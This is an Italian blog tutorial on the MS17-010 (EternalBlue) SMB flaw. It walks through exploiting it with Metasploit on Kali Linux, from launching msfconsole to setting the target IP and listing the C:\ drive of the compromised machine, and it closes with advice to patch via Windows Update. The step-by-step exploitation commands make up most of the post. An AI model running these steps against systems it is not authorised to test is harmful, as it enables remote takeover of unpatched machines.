Cari lettori di Tecnogalaxy, oggi parleremo della vulnerabilità MS17010 , che da il nome all’exploit EternalBlue,  si ritiene che sia stato scritto dalla National Security Agency (NSA).

Il mondo informatico è venuto a conoscenza dell’esistenza dell’exploit solo dopo che il gruppo di hacker chiamato The Shadow Brokers lo ha illegalmente diffuso nel lontano 14 aprile 2017.

Come tutti gli exploit scoperti da malintenzionati, è stato utilizzato per realizzare attacchi informatici attraverso il ransomware WannaCry, che grazie a EternalBlue, sfrutta una vulnerabilità del protocollo Server Message Block (SMB).

Pur essendo passato diverso tempo, ci sono nel mondo computer presenti in aziende produttive collegati ad internet e a vecchi PLC che non vengono aggiornati con le pacth che rilascia Microsoft, questi computer sono vulnerabili a questo tipo di attacco.

Sfruttare la vulnerabilità MS17010

Passiamo al nostro test utilizzando sempre il nostro caro amico Kali Linux.

Apriamo una shell e scriviamo il seguente comando:

service postgresql restart

Adesso dobbiamo iniziare il potente msfconsole:

msfconsole

Cerchiamo l’exploit scrivendo:

search ms17

Usiamo l’opzione 9

use 9

Scrivendo il comando show options potremo vedere tutte le opzioni che servono all’exploit per essere seguito.

set rhosts "l'ip del computer da testare"

Eseguimmo l’exploit scrivendo il seguente comando:

exploit

Bingo, exploit eseguito con successo, adesso se scriviamo il comando dir

Vedremo la radice del disco c:\ del computer violato.

Quale difesa utilizzare?

Semplice, come detto negli articoli precedenti tenere sempre aggiornato il proprio sistema operativo, in questo caso facendo Windows Update, solo così potremo mettere al sicuro il nostro dispositivo.

Come sempre fatene buon uso facendo dei test su vostri device / computer , farli su device/computer non vostri è illegale.

Al prossimo articolo 😊

N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.

Giorgio Perego

IT Manager

Leggi anche:

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.